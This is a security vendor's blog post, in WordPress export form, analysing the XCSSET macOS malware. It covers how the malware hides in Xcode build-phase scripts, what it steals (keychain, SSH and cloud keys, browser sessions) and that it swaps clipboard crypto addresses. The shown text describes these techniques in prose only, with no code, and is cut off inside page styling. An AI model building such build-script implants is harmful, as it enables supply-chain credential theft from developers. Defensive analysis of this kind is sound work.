{"id":5507,"date":"2026-04-29T13:55:35","date_gmt":"2026-04-29T13:55:35","guid":{"rendered":"https:\/\/adex.com\/blog\/?p=5507"},"modified":"2026-05-01T16:04:29","modified_gmt":"2026-05-01T16:04:29","slug":"case-study-xcsset-attack","status":"publish","type":"post","link":"https:\/\/adex.com\/blog\/case-study-xcsset-attack\/","title":{"rendered":"Inside the Build: First-Hand Analysis of XCSSET&#8217;s Attack on macOS Developer Pipelines"},"content":{"rendered":"\n<p>MacOS has long been considered inherently resistant to malware, but the threat landscape tells a different story. Attacks targeting the Apple ecosystem are more frequent and sophisticated than commonly assumed.&nbsp;<\/p>\n\n\n\n<p>The Adex team encountered this reality first-hand: we detected, analyzed, and attributed an active <strong>XCSSET infection<\/strong> \u2013 one of the most persistent and evasive malware families targeting macOS developers. This case study breaks down how the attack works and what teams can do to defend against it.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n<div class=\"toc\"><h4 class=\"toc__title\" id=\"contents\">Contents<\/h4><ul class=\"toc__list\"><li class=\"toc__list_item\"><a href=\"#malware-profile-what-is-xcsset\">Malware Profile: What is XCSSET<\/a><\/li><li class=\"toc__list_item\"><a href=\"#attack-anatomy-how-does-it-compromise-the-system\">Attack Anatomy: How Does It Compromise the System?<\/a><\/li><li class=\"toc__list_item\"><a href=\"#who-is-at-risk\">Who Is at Risk?<\/a><\/li><li class=\"toc__list_item\"><a href=\"#what-attackers-walk-away-with\">What Attackers Walk Away With<\/a><\/li><li class=\"toc__list_item\"><a href=\"#sample-discovery-and-behavioral-analysis\">Sample Discovery and Behavioral Analysis<\/a><\/li><li class=\"toc__list_item\"><a href=\"#building-the-protection-mechanisms\">Building the Protection Mechanisms<\/a><\/li><li class=\"toc__list_item\"><a href=\"#why-our-sample-is-almost-certainly-xcsset\">Why Our Sample Is Almost Certainly XCSSET<\/a><\/li><li class=\"toc__list_item\"><a href=\"#for-developers-what-to-check-right-now\">For Developers: What to Check Right Now<\/a><\/li><li class=\"toc__list_item\"><a href=\"#for-organizations-detection-containment-and-policy\">For Organizations: Detection, Containment, and Policy<\/a><\/li><li class=\"toc__list_item\"><a href=\"#infected-repositories-on-github-xcsset-in-the-wild\">Infected Repositories on GitHub: XCSSET in the Wild<\/a><\/li><li class=\"toc__list_item\"><a href=\"#selected-highlights\">Selected Highlights<\/a><\/li><li class=\"toc__list_item\"><a href=\"#running-the-search-independently\">Running the Search Independently<\/a><\/li><li class=\"toc__list_item\"><a href=\"#the-bigger-picture\">The Bigger Picture<\/a><\/li><li class=\"toc__list_item\"><a href=\"#appendix-1-full-list-24-repositories\">Appendix #1: Full List (24 repositories)<\/a><\/li><li class=\"toc__list_item\"><a href=\"#appendix-2-csset-timeline\">Appendix #2: CSSET Timeline<\/a><\/li><\/ul><\/div><style>\n.toc {}\n.toc__title {\n      font-size: 32px;\n    line-height: 40px;\n    font-weight: 700;\n}\n.toc__list_item {\n    color: #FE645A !important;\n}\n.toc__list_item:not(:last-child){\n    margin-bottom: 5px;\n}\n.toc__list_item a {\n    font-size: 18px;\n    line-height: 24px;\n    color: #FE645A;\n    font-weight: 600;\n}\n.toc__list_item a:hover {\n    text-decoration: underline;\n}\n@media (max-width: 1023px) {.toc__title {font-size: 24px;line-height: 32px;}}\n<\/style>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"malware-profile-what-is-xcsset\">Malware Profile: What is XCSSET<\/h2>\n\n\n<div class=\"block__bord\"><div class=\"block__bord_desc\"><p><strong>XCSSET<\/strong> is a modular macOS malware family first discovered in the summer of 2020 that has since undergone significant evolution. It is distributed through compromised Xcode projects and triggered at compile time \u2013 the moment a developer builds the project, the malicious payload executes.<\/p>\n<\/div><\/div>\n<style>\n.block__bord { margin: 32px 0; padding: 1.25em 2.375em;\tborder-radius: 24px; background: rgba(0, 220, 200, 0.20); }\n.block__bord_desc {font-size: 16px !important;font-weight: 400 !important;color: #606060 !important;}\n<\/style>\n\n\n\n<p>What sets XCSSET apart from more conventional malware is where it lives: not inside the compiled application, but embedded within the Xcode project itself. This distinction makes it particularly difficult to detect: there is nothing obviously malicious in the final app, and the infection is concealed in the build configuration files that most security tools never inspect.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p><strong><em>About Xcode<\/em><\/strong><\/p>\n\n\n\n<p>Xcode is Apple&#8217;s official integrated development environment (IDE) for building applications for macOS, iOS, iPadOS, watchOS, and tvOS. It is the standard toolchain for every Apple platform developer: from independent creators to enterprise engineering teams.<\/p>\n\n\n\n<p>Xcode projects are typically stored and shared via version control platforms such as GitHub, which makes them a natural vector for supply chain attacks: a developer clones what appears to be a legitimate project, opens it in Xcode, hits Build, and the malicious payload executes as a natural part of the compilation process. No suspicious downloads, no unusual permissions, no red flags from the system. The attack is entirely invisible within the standard developer workflow.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"attack-anatomy-how-does-it-compromise-the-system\">Attack Anatomy: How Does It Compromise the System?<\/h2>\n\n\n\n<p>Every Xcode project contains a set of build phase instructions \u2013 a configuration that tells the IDE exactly what to do when a developer hits Build: which scripts to run, which resources to bundle, which tests to execute.&nbsp;<\/p>\n\n\n<div class=\"block__bord\"><div class=\"block__bord_desc\"><p>XCSSET exploits this mechanism by injecting an additional build phase script into the project. The insertion is silent and requires no special privileges: it runs under the developer&#8217;s own account, inheriting all of their system access.<\/p>\n<\/div><\/div>\n<style>\n.block__bord { margin: 32px 0; padding: 1.25em 2.375em;\tborder-radius: 24px; background: rgba(0, 220, 200, 0.20); }\n.block__bord_desc {font-size: 16px !important;font-weight: 400 !important;color: #606060 !important;}\n<\/style>\n\n\n\n<p>Once triggered at compile time, the malicious script performs several actions in parallel: it harvests credentials and session tokens from browsers and cryptocurrency wallets, establishes persistence by registering itself as a login item so it survives reboots, and \u2013 most critically \u2013 scans the device for other Xcode projects and injects itself into each of them. In essence, the infection was designed to spread on its own.<\/p>\n\n\n\n<p>From here on, the infection spreads through three paths:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Repository:<\/strong> The dev pushes to GitHub, and anyone who clones and builds gets infected. No extra steps needed.<\/li>\n\n\n\n<li><strong>Dependency:<\/strong> If the project is used inside a larger codebase, the malicious script spreads upstream.<\/li>\n\n\n\n<li><strong>Credentials:<\/strong> Browsers on the infected machine are trojaned, exposing session tokens and login data \u2013 a risk that reaches far beyond the developer&#8217;s own environment.<\/li>\n<\/ul>\n\n\n    <div class=\"block__quote\"><p class=\"block__quote_desc\"><p>No infected apps have reached the App Store, and direct binary injection remains undocumented (Intego, 2020). The risk to end users is indirect, but it&#8217;s real.<\/p>\n<\/p><\/div>\n    <style>.block__quote {margin: 32px 0;padding-left: 20px;border-left: 3px solid #00B8A7;}.block__quote_desc {font-weight: 700 !important;font-size: 18px !important;line-height: 28px !important;margin-bottom: 24px !important;}.block__quote_author {display: none;}<\/style>\n\n\n\n<div class=\"htmlAdexBlock\">\n<style>\n  .wrap {\n    font-family: sans-serif;\n    background: #ffffff;\n    color: #0F0063;\n    padding: 36px 28px;\n    border-radius: 16px;\n    max-width: 860px;\n    margin: 0 auto;\n    border: 1px solid #e8eaf5;\n  }\n\n  .section-label {\n    font-size: 12px;\n    font-weight: 700;\n    letter-spacing: 0.12em;\n    text-transform: uppercase;\n    color: #00DBC7;\n    margin-bottom: 8px;\n  }\n\n  .section-heading {\n    font-size: 22px;\n    font-weight: 700;\n    color: #0F0063;\n    margin-bottom: 24px;\n    line-height: 1.3;\n  }\n\n  .flow { display: flex; flex-direction: column; }\n\n  .flow-step {\n    display: flex;\n    align-items: flex-start;\n    gap: 14px;\n    position: relative;\n  }\n\n  .flow-step:not(:last-child)::after {\n    content: '';\n    position: absolute;\n    left: 19px;\n    top: 40px;\n    width: 2px;\n    height: calc(100% - 8px);\n    background: linear-gradient(to bottom, #00DBC7, #00DBC722);\n  }\n\n  .step-icon {\n    width: 40px;\n    height: 40px;\n    border-radius: 50%;\n    background: #f0fdfb;\n    border: 2px solid #00DBC7;\n    display: flex;\n    align-items: center;\n    justify-content: center;\n    flex-shrink: 0;\n    font-size: 16px;\n    position: relative;\n    z-index: 1;\n    box-shadow: 0 2px 10px rgba(0,219,199,0.15);\n  }\n\n  .step-body {\n    background: #fafbff;\n    border: 1px solid #e8eaf5;\n    border-radius: 12px;\n    padding: 13px 18px;\n    flex: 1;\n    margin-bottom: 12px;\n    box-shadow: 0 2px 8px rgba(15,0,99,0.04);\n  }\n\n  .step-header {\n    display: flex;\n    align-items: baseline;\n    gap: 10px;\n    margin-bottom: 5px;\n  }\n\n  .step-label {\n    font-size: 10px;\n    font-weight: 700;\n    letter-spacing: 0.1em;\n    text-transform: uppercase;\n    color: #00A696;\n    flex-shrink: 0;\n  }\n\n  .step-title {\n    font-size: 14px;\n    font-weight: 600;\n    color: #0F0063;\n  }\n\n  .step-desc {\n    font-size: 12.5px;\n    color: #4a4f7a;\n    line-height: 1.6;\n  }\n\n  .actions-grid {\n    display: grid;\n    grid-template-columns: repeat(3, 1fr);\n    gap: 8px;\n    margin-top: 10px;\n  }\n\n  .action-card {\n    background: #ffffff;\n    border: 1px solid #d6f7f4;\n    border-top: 3px solid #00DBC7;\n    border-radius: 10px;\n    padding: 11px 10px;\n    text-align: center;\n  }\n\n  .action-icon { font-size: 18px; margin-bottom: 5px; }\n\n  .action-label {\n    font-size: 11.5px;\n    font-weight: 600;\n    color: #0F0063;\n    line-height: 1.3;\n  }\n\n  .action-sub {\n    font-size: 10.5px;\n    color: #8b90b8;\n    margin-top: 2px;\n    line-height: 1.35;\n  }\n\n  .vectors-grid {\n    display: grid;\n    grid-template-columns: repeat(3, 1fr);\n    gap: 8px;\n    margin-top: 10px;\n  }\n\n  .vector-card {\n    background: #ffffff;\n    border: 1px solid #e8eaf5;\n    border-radius: 10px;\n    padding: 11px 12px;\n  }\n\n  .vector-tag {\n    font-size: 10px;\n    font-weight: 700;\n    letter-spacing: 0.07em;\n    text-transform: uppercase;\n    padding: 2px 8px;\n    border-radius: 20px;\n    display: inline-block;\n    margin-bottom: 6px;\n  }\n\n  .tag-primary   { background: #fff0ef; color: #FF645A; }\n  .tag-secondary { background: #ede9fe; color: #A05DD2; }\n  .tag-tertiary  { background: #e6eeff; color: #00389C; }\n\n  .vector-title {\n    font-size: 12.5px;\n    font-weight: 600;\n    color: #0F0063;\n    margin-bottom: 3px;\n  }\n\n  .vector-desc {\n    font-size: 11.5px;\n    color: #8b90b8;\n    line-height: 1.5;\n  }\n\n  .note {\n    margin-top: 16px;\n    background: #f0fdfb;\n    border-left: 3px solid #00DBC7;\n    border-radius: 0 10px 10px 0;\n    padding: 12px 16px;\n    font-size: 12px;\n    color: #4a4f7a;\n    line-height: 1.65;\n  }\n\n  .note strong { color: #0F0063; }\n\n  @media (max-width: 600px) {\n    .actions-grid, .vectors-grid { grid-template-columns: 1fr; }\n    .section-heading { font-size: 18px; }\n    .wrap { padding: 24px 14px; }\n  }\n<\/style>\n<div class=\"wrap\">\n  <div class=\"section-label\">Attack Anatomy<\/div>\n  <div class=\"section-heading\">How Does XCSSET Compromise the System?<\/div>\n  <div class=\"flow\">\n\n    <div class=\"flow-step\">\n      <div class=\"step-icon\">\ud83d\uddc2\ufe0f<\/div>\n      <div class=\"step-body\">\n        <div class=\"step-header\">\n          <span class=\"step-label\">Step 01<\/span>\n          <span class=\"step-title\">Infected Project Opened<\/span>\n        <\/div>\n        <div class=\"step-desc\">A developer opens a compromised Xcode project. The payload sits not in the code, but in the <strong>build phase<\/strong> \u2014 instructions Xcode runs automatically when Build is triggered.<\/div>\n      <\/div>\n    <\/div>\n\n    <div class=\"flow-step\">\n      <div class=\"step-icon\">\u2699\ufe0f<\/div>\n      <div class=\"step-body\">\n        <div class=\"step-header\">\n          <span class=\"step-label\">Step 02<\/span>\n          <span class=\"step-title\">Build Triggered \u2192 Script Executes<\/span>\n        <\/div>\n        <div class=\"step-desc\">The injected script runs silently the moment the developer hits Build \u2014 no prompts, no elevated privileges. It runs as the developer&#8217;s own user.<\/div>\n      <\/div>\n    <\/div>\n\n    <div class=\"flow-step\">\n      <div class=\"step-icon\">\ud83d\udca5<\/div>\n      <div class=\"step-body\">\n        <div class=\"step-header\">\n          <span class=\"step-label\">Step 03<\/span>\n          <span class=\"step-title\">Three Actions Fire in Parallel<\/span>\n        <\/div>\n        <div class=\"actions-grid\">\n          <div class=\"action-card\">\n            <div class=\"action-icon\">\ud83c\udf6a<\/div>\n            <div class=\"action-label\">Credential Harvest<\/div>\n            <div class=\"action-sub\">Browsers, session tokens, crypto wallets<\/div>\n          <\/div>\n          <div class=\"action-card\">\n            <div class=\"action-icon\">\ud83d\udd01<\/div>\n            <div class=\"action-label\">Persistence<\/div>\n            <div class=\"action-sub\">Login item registered, survives reboots<\/div>\n          <\/div>\n          <div class=\"action-card\">\n            <div class=\"action-icon\">\ud83e\uddec<\/div>\n            <div class=\"action-label\">Self-Replication<\/div>\n            <div class=\"action-sub\">Injects into all other Xcode projects on disk<\/div>\n          <\/div>\n        <\/div>\n      <\/div>\n    <\/div>\n\n    <div class=\"flow-step\">\n      <div class=\"step-icon\">\ud83d\udce1<\/div>\n      <div class=\"step-body\">\n        <div class=\"step-header\">\n          <span class=\"step-label\">Step 04<\/span>\n          <span class=\"step-title\">Spreads via Three Vectors<\/span>\n        <\/div>\n        <div class=\"vectors-grid\">\n          <div class=\"vector-card\">\n            <span class=\"vector-tag tag-primary\">Primary<\/span>\n            <div class=\"vector-title\">Repository<\/div>\n            <div class=\"vector-desc\">Dev pushes to GitHub \u2192 clone + build = infected. Zero interaction needed.<\/div>\n          <\/div>\n          <div class=\"vector-card\">\n            <span class=\"vector-tag tag-secondary\">Secondary<\/span>\n            <div class=\"vector-title\">Dependency<\/div>\n            <div class=\"vector-desc\">Infected project used as a component \u2014 build phase script propagates upstream.<\/div>\n          <\/div>\n          <div class=\"vector-card\">\n            <span class=\"vector-tag tag-tertiary\">Tertiary<\/span>\n            <div class=\"vector-title\">Credentials<\/div>\n            <div class=\"vector-desc\">Trojaned browsers expose session tokens \u2014 risk extends beyond the dev machine.<\/div>\n          <\/div>\n        <\/div>\n      <\/div>\n    <\/div>\n\n  <\/div>\n\n  <div class=\"note\">\n    <strong>Note:<\/strong> No injection into compiled Mach-O binaries has been documented; no infected builds reached the App Store <em>(Intego, 2020)<\/em>. This is a textbook <strong>supply chain attack<\/strong> \u2014 the trusted developer is the target, not the end user directly.\n  <\/div>\n<\/div>\n<\/div>\n\n\n\n<p>This is a textbook supply chain attack: the target is not the end user directly, but the trusted link between them and the software: the developer, their tools, and their repositories.<\/p>\n\n\n    <div class=\"block__quote\"><p class=\"block__quote_desc\"><p>XCSSET isn&#8217;t new territory: <a href=\"http:\/\/XCSSET isn't new territory: XcodeGhost (2015)also used Xcode as an attack surface. The difference: XcodeGhost corrupted the Xcode installer itself, which made it detectable. XCSSET doesn't touch Xcode at all \u2013 it hides inside individual projects, where no one thinks to look.\" target=\"_blank\">XcodeGhost (2015)<\/a> also used Xcode as an attack surface. The difference: XcodeGhost corrupted the Xcode installer itself, which made it detectable. XCSSET doesn&#8217;t touch Xcode at all \u2013 it hides inside individual projects, where no one thinks to look.<\/p>\n<\/p><\/div>\n    <style>.block__quote {margin: 32px 0;padding-left: 20px;border-left: 3px solid #00B8A7;}.block__quote_desc {font-weight: 700 !important;font-size: 18px !important;line-height: 28px !important;margin-bottom: 24px !important;}.block__quote_author {display: none;}<\/style>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"who-is-at-risk\">Who Is at Risk?<\/h2>\n\n\n\n<p>Anyone in the Apple development ecosystem is a potential target.<\/p>\n\n\n\n<p>The risk is highest for teams that regularly pull Xcode projects or SDKs from GitHub <em>(more on that later)<\/em>, independent developers who work with third-party templates and starter repositories, and any organization whose software is built on macOS. If a machine is used to build iOS or macOS apps, it is a viable entry point.<\/p>\n\n\n\n<div class=\"htmlAdexBlock\">\n<style>\n  .wrap {\n    font-family: sans-serif;\n    background: #ffffff;\n    color: #0F0063;\n    padding: 40px 28px;\n    border-radius: 16px;\n    max-width: 860px;\n    margin: 0 auto;\n    border: 1px solid #e8eaf5;\n  }\n\n  .section-label {\n    font-size: 12px;\n    font-weight: 700;\n    letter-spacing: 0.12em;\n    text-transform: uppercase;\n    color: #00DBC7;\n    margin-bottom: 8px;\n  }\n\n  .section-heading {\n    font-size: 22px;\n    font-weight: 700;\n    color: #0F0063;\n    margin-bottom: 28px;\n    line-height: 1.3;\n  }\n\n  .risk-grid {\n    display: grid;\n    grid-template-columns: repeat(3, 1fr);\n    gap: 12px;\n  }\n\n  .risk-card {\n    background: #fafbff;\n    border: 1px solid #e8eaf5;\n    border-top: 3px solid #00DBC7;\n    border-radius: 12px;\n    padding: 18px 16px;\n  }\n\n  .risk-icon {\n    font-size: 22px;\n    margin-bottom: 10px;\n  }\n\n  .risk-title {\n    font-size: 13px;\n    font-weight: 700;\n    color: #0F0063;\n    margin-bottom: 6px;\n    line-height: 1.4;\n  }\n\n  .risk-desc {\n    font-size: 12px;\n    color: #8b90b8;\n    line-height: 1.6;\n  }\n\n  @media (max-width: 600px) {\n    .risk-grid { grid-template-columns: 1fr; }\n    .section-heading { font-size: 18px; }\n    .wrap { padding: 28px 16px; }\n  }\n<\/style>\n<div class=\"wrap\">\n\n  <div class=\"section-label\">Exposure<\/div>\n  <div class=\"section-heading\">Who Is at Risk?<\/div>\n\n  <div class=\"risk-grid\">\n\n    <div class=\"risk-card\">\n      <div class=\"risk-icon\">\ud83d\udc65<\/div>\n      <div class=\"risk-title\">Teams on GitHub<\/div>\n      <div class=\"risk-desc\">Regularly pull Xcode projects, SDKs, or dependencies from public repositories.<\/div>\n    <\/div>\n\n    <div class=\"risk-card\">\n      <div class=\"risk-icon\">\ud83e\uddd1\u200d\ud83d\udcbb<\/div>\n      <div class=\"risk-title\">Independent Developers<\/div>\n      <div class=\"risk-desc\">Use third-party templates or starter repositories \u2014 common practice, rarely scrutinized.<\/div>\n    <\/div>\n\n    <div class=\"risk-card\">\n      <div class=\"risk-icon\">\ud83c\udfe2<\/div>\n      <div class=\"risk-title\">Any macOS Build Environment<\/div>\n      <div class=\"risk-desc\">Organizations shipping iOS or macOS software. The build machine is the target.<\/div>\n    <\/div>\n\n  <\/div>\n\n<\/div>\n<\/div>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"what-attackers-walk-away-with\">What Attackers Walk Away With<\/h2>\n\n\n\n<p>With unrestricted access to the infected machine, XCSSET operates across three vectors: data theft, system manipulation, and persistence.<\/p>\n\n\n\n<p><strong>Data Theft<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>XCSSET pulls credentials directly from Keychain and configuration files: cloud keys, AWS tokens, SSH keys, Git access, and advertising platform tokens (<a href=\"https:\/\/www.trendmicro.com\/en_us\/research\/20\/h\/xcsset-mac-malware--infects-xcode-projects--uses-0-days.html\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">Trend Micro, 2020<\/a>).&nbsp;<\/li>\n\n\n\n<li>Browser sessions are compromised across Safari, Chrome, and, as of the 2025 variant, Firefox.&nbsp;<\/li>\n\n\n\n<li>Messenger data is also in scope: Telegram, WeChat, QQ, Skype, Apple Notes, and Evernote (<a href=\"https:\/\/trendmicro.com\/en_ca\/research\/21\/g\/updated-xcsset-malware-targets-telegram--other-apps.html\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">Trend Micro, 2021<\/a>).&nbsp;<\/li>\n\n\n\n<li>Screenshots can be captured silently via <a href=\"https:\/\/www.jamf.com\/blog\/zero-day-tcc-bypass-discovered-in-xcsset-malware\/\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">CVE-2021-30713<\/a>, bypassing macOS privacy controls entirely.<\/li>\n<\/ul>\n\n\n\n<p><strong>Manipulate<\/strong><\/p>\n\n\n\n<p>Any BTC or ETH address copied to the clipboard is silently replaced with one controlled by the attacker. It means that the payment indeed goes through, but lands in the wrong wallet (<a href=\"http:\/\/microsoft\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">Microsoft, Sept 2025<\/a>).&nbsp;<\/p>\n\n\n\n<p>On top of that, XCSSET replaces Safari, Chrome, and Firefox with modified versions carrying an injected JavaScript backdoor, giving the attacker persistent access to everything the browser touches (<a href=\"https:\/\/www.trendmicro.com\/en_us\/research\/20\/h\/xcsset-mac-malware--infects-xcode-projects--uses-0-days.html\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">Trend Micro, 2020<\/a>).<\/p>\n\n\n\n<p><strong>Persist &amp; Damage<\/strong><\/p>\n\n\n\n<p>Every Xcode project on the machine gets infected: new injection methods were documented as recently as 2025, according to <a href=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2025\/02\/17\/new-xcsset-malware-variant-found-in-the-wild\/\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">Microsoft<\/a>. And from the very first report: XCSSET ships with a ransomware module capable of encrypting files (<a href=\"https:\/\/www.trendmicro.com\/en_us\/research\/20\/h\/xcsset-mac-malware--infects-xcode-projects--performs-uxss-attack.html\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">Trend Micro, 2020<\/a>).<\/p>\n\n\n\n<div class=\"htmlAdexBlock\">\n<style>\n  .wrap {\n    font-family: sans-serif;\n    background: #ffffff;\n    color: #0F0063;\n    padding: 40px 28px;\n    border-radius: 16px;\n    max-width: 860px;\n    margin: 0 auto;\n    border: 1px solid #e8eaf5;\n  }\n\n  .section-label {\n    font-size: 12px;\n    font-weight: 700;\n    letter-spacing: 0.12em;\n    text-transform: uppercase;\n    color: #00DBC7;\n    margin-bottom: 8px;\n  }\n\n  .section-heading {\n    font-size: 22px;\n    font-weight: 700;\n    color: #0F0063;\n    margin-bottom: 6px;\n    line-height: 1.3;\n  }\n\n  .section-sub {\n    font-size: 13.5px;\n    color: #4a4f7a;\n    margin-bottom: 28px;\n    line-height: 1.6;\n  }\n\n  .category-label {\n    font-size: 11px;\n    font-weight: 700;\n    letter-spacing: 0.1em;\n    text-transform: uppercase;\n    color: #8b90b8;\n    margin-bottom: 10px;\n    margin-top: 24px;\n  }\n\n  .cards-grid {\n    display: grid;\n    grid-template-columns: repeat(2, 1fr);\n    gap: 10px;\n  }\n\n  .card {\n    background: #fafbff;\n    border: 1px solid #e8eaf5;\n    border-radius: 12px;\n    padding: 16px 18px;\n    display: flex;\n    gap: 14px;\n    align-items: flex-start;\n  }\n\n  .card-icon {\n    font-size: 20px;\n    flex-shrink: 0;\n    margin-top: 1px;\n  }\n  .card-title {\n    font-size: 13px;\n    font-weight: 700;\n    color: #0F0063;\n    margin-bottom: 4px;\n    line-height: 1.4;\n  }\n\n  .card-desc {\n    font-size: 12px;\n    color: #8b90b8;\n    line-height: 1.6;\n  }\n\n  .card-source {\n    display: inline-block;\n    margin-top: 6px;\n    font-size: 10px;\n    font-weight: 600;\n    color: #a0a5c8;\n    letter-spacing: 0.05em;\n  }\n\n  \/* severity borders *\/\n  .card.high   { border-left: 3px solid #FF645A; }\n  .card.medium { border-left: 3px solid #A05DD2; }\n  .card.low    { border-left: 3px solid #00DBC7; }\n\n  .tag {\n    display: inline-block;\n    font-size: 10px;\n    font-weight: 700;\n    letter-spacing: 0.07em;\n    text-transform: uppercase;\n    padding: 2px 8px;\n    border-radius: 20px;\n    margin-bottom: 6px;\n  }\n\n  .tag-steal   { background: #fff0ef; color: #FF645A; }\n  .tag-persist { background: #ede9fe; color: #A05DD2; }\n  .tag-damage  { background: #fff4e0; color: #D97706; }\n\n  @media (max-width: 600px) {\n    .cards-grid { grid-template-columns: 1fr; }\n    .section-heading { font-size: 18px; }\n    .wrap { padding: 28px 16px; }\n  }\n<\/style>\n<div class=\"wrap\">\n  <div class=\"section-label\">Capabilities<\/div>\n  <div class=\"section-heading\">What Does XCSSET Actually Do?<\/div>\n  <div class=\"section-sub\">Once active, XCSSET operates across three areas: data theft, system manipulation, and persistence.<\/div>\n  <!-- STEAL -->\n  <div class=\"category-label\">Steal<\/div>\n  <div class=\"cards-grid\">\n    <div class=\"card high\">\n      <div class=\"card-icon\">\ud83d\udd11<\/div>\n      <div class=\"card-content\">\n        <span class=\"tag tag-steal\">Credentials<\/span>\n        <div class=\"card-title\">Keychain &#038; Config Files<\/div>\n        <div class=\"card-desc\">Cloud keys, AWS tokens, SSH keys, Git access, advertising platform tokens.<\/div>\n        <span class=\"card-source\">Trend Micro, 2020<\/span>\n      <\/div>\n    <\/div>\n    <div class=\"card high\">\n      <div class=\"card-icon\">\ud83c\udf6a<\/div>\n      <div class=\"card-content\">\n        <span class=\"tag tag-steal\">Sessions<\/span>\n        <div class=\"card-title\">Browser Cookies &#038; Sessions<\/div>\n        <div class=\"card-desc\">Safari, Chrome \u2014 and Firefox as of the 2025 variant.<\/div>\n        <span class=\"card-source\">Trend Micro, 2020 \u00b7 Microsoft, 2025<\/span>\n      <\/div>\n    <\/div>\n\n    <div class=\"card high\">\n      <div class=\"card-icon\">\ud83d\udcac<\/div>\n      <div class=\"card-content\">\n        <span class=\"tag tag-steal\">Data<\/span>\n        <div class=\"card-title\">Messengers &#038; Notes<\/div>\n        <div class=\"card-desc\">Telegram, WeChat, QQ, Skype, Apple Notes, Evernote.<\/div>\n        <span class=\"card-source\">Trend Micro, 2021<\/span>\n      <\/div>\n    <\/div>\n\n    <div class=\"card high\">\n      <div class=\"card-icon\">\ud83d\udcf8<\/div>\n      <div class=\"card-content\">\n        <span class=\"tag tag-steal\">Surveillance<\/span>\n        <div class=\"card-title\">Screen Capture<\/div>\n        <div class=\"card-desc\">Silent screenshots via CVE-2021-30713, bypassing TCC privacy controls.<\/div>\n        <span class=\"card-source\">CVE-2021-30713<\/span>\n      <\/div>\n    <\/div>\n\n  <\/div>\n\n  <!-- MANIPULATE -->\n  <div class=\"category-label\">Manipulate<\/div>\n  <div class=\"cards-grid\">\n\n    <div class=\"card medium\">\n      <div class=\"card-icon\">\ud83d\udccb<\/div>\n      <div class=\"card-content\">\n        <span class=\"tag tag-persist\">Clipboard<\/span>\n        <div class=\"card-title\">Crypto Wallet Hijacking<\/div>\n        <div class=\"card-desc\">Detects BTC\/ETH addresses in clipboard and silently replaces them with attacker-controlled ones.<\/div>\n        <span class=\"card-source\">Microsoft, Sept 2025<\/span>\n      <\/div>\n    <\/div>\n\n    <div class=\"card medium\">\n      <div class=\"card-icon\">\ud83c\udf10<\/div>\n      <div class=\"card-content\">\n        <span class=\"tag tag-persist\">Trojanization<\/span>\n        <div class=\"card-title\">Browser Backdoor<\/div>\n        <div class=\"card-desc\">Replaces Safari, Chrome, Firefox with modified versions carrying an injected JavaScript backdoor.<\/div>\n        <span class=\"card-source\">Trend Micro, 2020 \u00b7 Intego, 2020<\/span>\n      <\/div>\n    <\/div>\n\n  <\/div>\n\n  <!-- PERSIST & DAMAGE -->\n  <div class=\"category-label\">Persist &#038; Damage<\/div>\n  <div class=\"cards-grid\">\n\n    <div class=\"card low\">\n      <div class=\"card-icon\">\ud83e\uddec<\/div>\n      <div class=\"card-content\">\n        <span class=\"tag tag-steal\">Propagation<\/span>\n        <div class=\"card-title\">Xcode Project Infection<\/div>\n        <div class=\"card-desc\">Injects into every Xcode project on the machine. New injection methods documented in 2025.<\/div>\n        <span class=\"card-source\">Trend Micro, 2020 \u00b7 Microsoft, 2025<\/span>\n      <\/div>\n    <\/div>\n\n    <div class=\"card\" style=\"border-left: 3px solid #D97706;\">\n      <div class=\"card-icon\">\ud83d\udd12<\/div>\n      <div class=\"card-content\">\n        <span class=\"tag tag-damage\">Ransomware<\/span>\n        <div class=\"card-title\">File Encryption<\/div>\n        <div class=\"card-desc\">A ransomware module is bundled within XCSSET \u2014 documented since the original discovery.<\/div>\n        <span class=\"card-source\">Trend Micro, 2020<\/span>\n      <\/div>\n    <\/div>\n\n  <\/div>\n\n<\/div>\n<\/div>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"sample-discovery-and-behavioral-analysis\">Sample Discovery and Behavioral Analysis<\/h2>\n\n\n\n<p>One of Adex&#8217;s clients \u2013 an iOS app development studio \u2013 reached out with a specific concern: their infrastructure might already be exposed to XCSSET.&nbsp;<\/p>\n\n\n\n<p>Adex began a hands-on investigation. The process broke down into four stages: spotting the anomaly, capturing the sample, dissecting its behavior, and tracing how it established persistence.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"1-spotting-the-malware\">1. <strong>Spotting the malware<\/strong><\/h3>\n\n\n\n<p>It started with a routine <strong>ps<\/strong> check \u2013 nothing exotic, just a standard look at what was running on the machine. But one line stood out immediately:<\/p>\n\n\n\n<div class=\"htmlAdexBlock\">\n<style>\n  .wrap {\n    background: #ffffff;\n    padding: 40px 28px;\n    border-radius: 16px;\n    max-width: 860px;\n    margin: 0 auto;\n    border: 1px solid #e8eaf5;\n  }\n\n  .code-block {\n    background: #fafbff;\n    border: 1px solid #e8eaf5;\n    border-radius: 12px;\n    overflow: hidden;\n  }\n\n  .code-topbar {\n    display: flex;\n    align-items: center;\n    gap: 6px;\n    padding: 10px 16px;\n    background: #f2f4fc;\n    border-bottom: 1px solid #e8eaf5;\n  }\n\n  .dot { width: 10px; height: 10px; border-radius: 